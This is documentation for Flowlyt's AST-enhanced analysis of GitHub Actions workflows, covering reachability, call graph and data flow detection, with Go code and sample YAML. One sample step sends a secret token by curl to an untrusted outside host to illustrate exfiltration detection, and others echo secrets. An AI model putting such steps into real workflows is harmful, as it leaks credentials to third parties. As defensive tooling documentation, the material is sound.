This document describes the new AST-based analysis capabilities in Flowlyt that enable reachability analysis and call graph analysis to reduce false positives and catch issues in reachable code paths.
The AST-enhanced analysis engine extends Flowlyt's existing hybrid engine with:
- Reachability Analysis - Determines which parts of workflows are actually reachable during execution
- Call Graph Analysis - Builds a graph of dependencies and calls between jobs, steps, and actions
- Data Flow Analysis - Tracks how sensitive data flows through the workflow
- False Positive Reduction - Filters out findings in unreachable code paths
ASTAnalyzer is the main orchestrator that coordinates parsing, reachability, and data flow analysis.
type ASTAnalyzer struct {
    callGraph    *CallGraph
    dataFlow     *DataFlowAnalyzer
    reachability *ReachabilityAnalyzer
}

CallGraph builds and maintains a graph of workflow components and their relationships.
type CallGraph struct {
    nodes map[string]*CallNode
    edges map[string][]string
}

ReachabilityAnalyzer determines which nodes are reachable from entry points (triggers).
type ReachabilityAnalyzer struct {
    callGraph      *CallGraph
    reachableNodes map[string]bool
    conditions     map[string]*ConditionAnalyzer
}

DataFlowAnalyzer tracks data sources, sinks, and flows to identify potential security issues.
type DataFlowAnalyzer struct {
    sources map[string]*DataSource
    sinks   map[string]*DataSink
    flows   []*DataFlow
}

The reachability analyzer determines which parts of a workflow can actually be executed:
- Entry Point Detection: Identifies workflow triggers as entry points
- Dependency Tracking: Follows job dependencies (`needs` relationships)
- Conditional Analysis: Evaluates `if` conditions to determine reachability
- Static Evaluation: Performs static analysis on simple conditions
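The steps above can be sketched as a small fixed-point computation. This is a minimal illustration, not Flowlyt's implementation: the `Job` type, `staticallyFalse`, and `ReachableJobs` are hypothetical names, jobs without `needs` are assumed to be started directly by a trigger, and status functions such as `always()` are not modeled.

```go
package main

import "fmt"

// Job is a hypothetical, simplified view of one workflow job.
type Job struct {
	Needs []string // job IDs listed under `needs`
	If    string   // raw `if` expression; empty means unconditional
}

// staticallyFalse reports whether a condition is the literal false.
// Every other expression is treated as possibly true (conservative).
func staticallyFalse(cond string) bool {
	return cond == "false" || cond == "${{ false }}"
}

// ReachableJobs iterates to a fixed point: a job becomes reachable once its
// condition is not statically false and every job it needs is reachable.
func ReachableJobs(jobs map[string]Job) map[string]bool {
	reachable := make(map[string]bool)
	for changed := true; changed; {
		changed = false
		for id, job := range jobs {
			if reachable[id] || staticallyFalse(job.If) {
				continue
			}
			ready := true
			for _, dep := range job.Needs {
				if !reachable[dep] {
					ready = false
					break
				}
			}
			if ready {
				reachable[id] = true
				changed = true
			}
		}
	}
	return reachable
}

func main() {
	jobs := map[string]Job{
		"build":      {},
		"never-runs": {If: "false"},
		"deploy":     {Needs: []string{"build"}},
		"notify":     {Needs: []string{"never-runs"}},
	}
	reachable := ReachableJobs(jobs)
	for _, id := range []string{"build", "deploy", "never-runs", "notify"} {
		fmt.Printf("%-10s reachable=%v\n", id, reachable[id])
	}
}
```

In this sketch a job that needs an unreachable job is itself treated as unreachable, which is why `notify` is excluded along with `never-runs`.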
Example of unreachable code detection:
jobs:
  never-runs:
    if: false  # Statically false condition
    runs-on: ubuntu-latest
    steps:
      - run: echo "This will never execute"
        env:
          SECRET: ${{ secrets.API_KEY }}  # A finding here would be a false positive

Call graph analysis builds a comprehensive graph of workflow components:
- Node Types:
  - `trigger` - Workflow triggers (push, PR, etc.)
  - `job` - Individual jobs
  - `step` - Steps within jobs
  - `action` - External actions being used
  - `external_call` - Network calls, file operations, etc.
- Edge Types:
  - Trigger to job relationships
  - Job dependency relationships (`needs`)
  - Step execution order
  - Action invocations
  - External command calls
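To make the node and edge types concrete, here is a minimal sketch of building such a graph. The `nodes` and `edges` fields mirror the `CallGraph` struct shown earlier; the `CallNode` fields, the `NodeType` constants, the ID scheme (`job:build`, `step:build/checkout`), and all methods are assumptions made for illustration.

```go
package main

import "fmt"

// NodeType names the kinds of nodes listed above.
type NodeType string

const (
	NodeTrigger NodeType = "trigger"
	NodeJob     NodeType = "job"
	NodeStep    NodeType = "step"
	NodeAction  NodeType = "action"
)

// CallNode fields are assumed; the source only names the type.
type CallNode struct {
	ID   string
	Type NodeType
}

// CallGraph stores nodes by ID and directed edges as adjacency lists.
type CallGraph struct {
	nodes map[string]*CallNode
	edges map[string][]string
}

func NewCallGraph() *CallGraph {
	return &CallGraph{nodes: map[string]*CallNode{}, edges: map[string][]string{}}
}

func (g *CallGraph) AddNode(id string, t NodeType) {
	g.nodes[id] = &CallNode{ID: id, Type: t}
}

// AddEdge records a directed edge and rejects unknown endpoints.
func (g *CallGraph) AddEdge(from, to string) error {
	if g.nodes[from] == nil || g.nodes[to] == nil {
		return fmt.Errorf("unknown node in edge %q -> %q", from, to)
	}
	g.edges[from] = append(g.edges[from], to)
	return nil
}

// Successors returns the IDs directly reachable from id.
func (g *CallGraph) Successors(id string) []string { return g.edges[id] }

func main() {
	g := NewCallGraph()
	g.AddNode("trigger:push", NodeTrigger)
	g.AddNode("job:build", NodeJob)
	g.AddNode("job:deploy", NodeJob)
	g.AddNode("step:build/checkout", NodeStep)
	g.AddNode("action:actions/checkout", NodeAction)

	edges := [][2]string{
		{"trigger:push", "job:build"},                     // trigger to job
		{"job:build", "job:deploy"},                       // deploy needs build
		{"job:build", "step:build/checkout"},              // job to its step
		{"step:build/checkout", "action:actions/checkout"}, // action invocation
	}
	for _, e := range edges {
		if err := g.AddEdge(e[0], e[1]); err != nil {
			fmt.Println("error:", err)
		}
	}
	fmt.Println("successors of job:build:", g.Successors("job:build"))
}
```

Edges here point in execution order, so a `needs` relationship is stored from the dependency to the dependent job. That choice keeps reachability a plain forward traversal from the trigger nodes.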
Data flow analysis tracks the movement of sensitive data through workflows:
- Data Sources:
  - Secrets (`${{ secrets.* }}`)
  - GitHub context (`${{ github.* }}`)
  - Environment variables
  - Action outputs
- Data Sinks:
  - Network calls (curl, wget)
  - File operations
  - Logging commands
  - Action inputs
- Flow Detection:
  - Identifies when sensitive data reaches potentially unsafe sinks
  - Calculates severity based on data sensitivity and sink risk
  - Provides detailed remediation advice
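A rough sketch of the source-to-sink idea follows. It is deliberately naive and is not Flowlyt's detection logic: it only looks at the first word of each line in a `run` script, and the `Flow` type, the `sinkKinds` table, and the severity labels are assumptions chosen for the example.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// secretRef matches expressions of the form ${{ secrets.NAME }}.
var secretRef = regexp.MustCompile(`\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}`)

// sinkKinds maps a command name to a hypothetical sink category.
var sinkKinds = map[string]string{
	"curl": "network",
	"wget": "network",
	"echo": "logging",
}

// Flow describes one secret reaching one sink.
type Flow struct {
	Secret   string
	Sink     string
	Severity string
}

// FindSecretFlows scans a run script line by line and reports every secret
// reference that appears on a line whose command is a known sink.
func FindSecretFlows(run string) []Flow {
	var flows []Flow
	for _, line := range strings.Split(run, "\n") {
		fields := strings.Fields(line)
		if len(fields) == 0 {
			continue
		}
		kind, ok := sinkKinds[fields[0]]
		if !ok {
			continue // comments and unknown commands are skipped
		}
		for _, m := range secretRef.FindAllStringSubmatch(line, -1) {
			severity := "MEDIUM" // assumed label for non-network sinks
			if kind == "network" {
				severity = "HIGH" // assumed label: secret leaves the runner
			}
			flows = append(flows, Flow{Secret: m[1], Sink: kind, Severity: severity})
		}
	}
	return flows
}

func main() {
	run := `# Data flow analysis detects secret exposure via network
curl -H "Auth: ${{ secrets.TOKEN }}" https://untrusted.com/api`
	for _, f := range FindSecretFlows(run) {
		fmt.Printf("secret %s reaches %s sink (severity %s)\n", f.Secret, f.Sink, f.Severity)
	}
}
```

A fuller analysis would also follow secrets through `env` mappings and step outputs, which this line-based sketch does not attempt.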
import (
    "context"
    "fmt"
    "log"

    "github.com/harekrishnarai/flowlyt/pkg/engine"
    "github.com/harekrishnarai/flowlyt/pkg/parser"
)

// Create enhanced engine with AST analysis
config := engine.DefaultASTEnhancedConfig()
config.EnableReachabilityAnalysis = true
config.EnableDataFlowAnalysis = true
config.FilterUnreachableFindings = true

enhancedEngine, err := engine.NewASTEnhancedEngine(config)
if err != nil {
    log.Fatal(err)
}

// Analyze workflows (workflowContent is assumed to hold the file's contents)
workflowFiles := []parser.WorkflowFile{
    {Path: ".github/workflows/ci.yml", Content: workflowContent},
}
result, err := enhancedEngine.AnalyzeWithAST(context.Background(), workflowFiles)
if err != nil {
    log.Fatal(err)
}

// Access enhanced results
fmt.Printf("Reachable nodes: %d\n", result.ReachabilityReport.ReachableNodes)
fmt.Printf("Data flow findings: %d\n", len(result.DataFlowFindings))
fmt.Printf("Filtered findings: %d\n", result.FilteredFindings)

type ASTEnhancedConfig struct {
    EnableReachabilityAnalysis bool   // Enable reachability analysis
    EnableDataFlowAnalysis     bool   // Enable data flow tracking
    EnableCallGraphAnalysis    bool   // Enable call graph construction
    FilterUnreachableFindings  bool   // Filter findings in unreachable code
    MinDataFlowSeverity        string // Minimum severity for data flow findings
    ReachabilityConfig         ReachabilityConfig
}

type ReachabilityConfig struct {
    AnalyzeConditionals     bool // Analyze conditional expressions
    StaticEvaluation        bool // Perform static evaluation of conditions
    MarkUnreachableFindings bool // Mark unreachable findings instead of filtering
    ReportUnreachableCode   bool // Include unreachable code in reports
}

By filtering out findings in unreachable code paths, the analysis becomes more precise:
jobs:
  security-scan:
    if: github.event_name == 'never'  # Will never be true
    steps:
      - run: echo ${{ secrets.API_KEY }}  # Finding filtered out as unreachable

Data flow analysis catches complex security issues:
steps:
  - name: Get API data
    run: |
      # Data flow analysis detects secret exposure via network
      curl -H "Auth: ${{ secrets.TOKEN }}" https://untrusted.com/api

Call graph analysis makes job dependencies and execution flow explicit:
jobs:
  build:
    outputs:
      version: ${{ steps.version.outputs.version }}
    steps:
      - id: version
        run: echo "version=1.0.0" >> $GITHUB_OUTPUT
  deploy:
    needs: build
    steps:
      - run: |
          # Analysis understands this depends on build job output
          echo "Deploying version ${{ needs.build.outputs.version }}"

The AST analysis enhances existing security rules and adds new categories:
- CategoryReachability - Issues related to unreachable code
- CategoryDataFlow - Data flow security violations
- CategoryCallGraph - Issues detected through call graph analysis
Existing rule areas enhanced by the analysis:
- Secret Exposure: Tracks secret usage from source to potential leak points
- Privilege Escalation: Analyzes permission flows and escalation paths
- Supply Chain: Maps action dependencies and external calls
- Data Exfiltration: Detects sensitive data sent to external endpoints
The AST analysis adds computational overhead but provides significant security benefits:
- Parsing: ~10-20ms per workflow file
- Call Graph: ~5-10ms per workflow
- Reachability: ~10-30ms depending on complexity
- Data Flow: ~20-50ms depending on sources/sinks
Total overhead is typically 50-100ms per workflow, which is acceptable for most use cases.
Current limitations:
- Dynamic Conditions: Cannot analyze conditions that depend on runtime values
- Complex Expressions: Limited static evaluation of complex conditional logic
- Cross-Workflow: Currently analyzes workflows in isolation
- Action Internals: Cannot see inside third-party actions
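The first two limitations can be illustrated with a three-valued evaluator: anything that cannot be decided statically stays unknown and must be treated as reachable. This is a sketch under stated assumptions, not Flowlyt's `ConditionAnalyzer`; the `Tri` type and `EvalCondition` are hypothetical, and only boolean literals and `==` between two quoted string literals are handled.

```go
package main

import (
	"fmt"
	"strings"
)

// Tri is a three-valued result for static condition evaluation.
type Tri int

const (
	Unknown Tri = iota // depends on runtime values or unsupported syntax
	True
	False
)

func (t Tri) String() string {
	return [...]string{"unknown", "true", "false"}[t]
}

// isLiteral reports whether s is a single-quoted string with no inner quotes.
func isLiteral(s string) bool {
	return len(s) >= 2 && strings.HasPrefix(s, "'") &&
		strings.HasSuffix(s, "'") && strings.Count(s, "'") == 2
}

// EvalCondition statically evaluates a small subset of `if` expressions.
func EvalCondition(expr string) Tri {
	e := strings.TrimSpace(expr)
	e = strings.TrimSuffix(strings.TrimPrefix(e, "${{"), "}}")
	e = strings.TrimSpace(e)
	switch e {
	case "true":
		return True
	case "false":
		return False
	}
	if left, right, ok := strings.Cut(e, "=="); ok {
		left, right = strings.TrimSpace(left), strings.TrimSpace(right)
		if isLiteral(left) && isLiteral(right) {
			// GitHub expressions compare strings case-insensitively.
			if strings.EqualFold(left, right) {
				return True
			}
			return False
		}
	}
	return Unknown // context values such as github.ref are only known at runtime
}

func main() {
	for _, c := range []string{
		"false",
		"${{ true }}",
		"'a' == 'b'",
		"github.ref == 'refs/heads/main'",
	} {
		fmt.Printf("%-35q -> %v\n", c, EvalCondition(c))
	}
}
```

Returning `Unknown` instead of guessing keeps the filter conservative: a finding is only dropped when the condition is provably false.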
Planned enhancements:
- Cross-Workflow Analysis: Track dependencies between workflows
- Dynamic Analysis: Integrate with runtime information
- Action Scanning: Deep analysis of popular GitHub Actions
- Machine Learning: Use ML to improve condition analysis
- Performance Optimization: Caching and incremental analysis
The AST analysis works alongside existing pattern-based rules:
- Pattern Rules: Continue to work for basic detection
- AST Enhancement: Provides additional context and filtering
- Combined Results: Merges findings from both approaches
- Confidence Scoring: AST analysis can increase confidence in findings
This creates a layered security approach that combines the speed of pattern matching with the precision of AST analysis.
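As a sketch of how the two layers might be combined, the function below takes pattern-rule findings and a reachability map, then either filters or marks findings in unreachable jobs. The `Finding` type, the `ApplyReachability` function, the integer confidence scale, and the +20 boost are all assumptions for illustration; the `filter` flag loosely mirrors the choice between `FilterUnreachableFindings` and `MarkUnreachableFindings`.

```go
package main

import "fmt"

// Finding is a hypothetical pattern-rule result tied to a job.
type Finding struct {
	RuleID      string
	JobID       string
	Confidence  int  // 0-100, assumed scale
	Unreachable bool // set when the finding is marked instead of filtered
}

// ApplyReachability merges pattern findings with reachability results.
// Findings in reachable jobs get a confidence boost (capped at 100).
// Findings in unreachable jobs are dropped when filter is true and
// marked as unreachable otherwise.
func ApplyReachability(findings []Finding, reachable map[string]bool, filter bool) (kept []Finding, filtered int) {
	for _, f := range findings {
		if reachable[f.JobID] {
			f.Confidence += 20 // assumed boost value
			if f.Confidence > 100 {
				f.Confidence = 100
			}
			kept = append(kept, f)
			continue
		}
		if filter {
			filtered++
			continue
		}
		f.Unreachable = true
		kept = append(kept, f)
	}
	return kept, filtered
}

func main() {
	findings := []Finding{
		{RuleID: "secret-exposure", JobID: "build", Confidence: 70},
		{RuleID: "secret-exposure", JobID: "never-runs", Confidence: 70},
	}
	reachable := map[string]bool{"build": true}

	kept, filtered := ApplyReachability(findings, reachable, true)
	fmt.Printf("filter mode: kept=%d filtered=%d\n", len(kept), filtered)

	kept, filtered = ApplyReachability(findings, reachable, false)
	fmt.Printf("mark mode:   kept=%d filtered=%d\n", len(kept), filtered)
}
```

Because `Finding` is passed by value inside the loop, the input slice is left unmodified, so the same findings can be run through both modes.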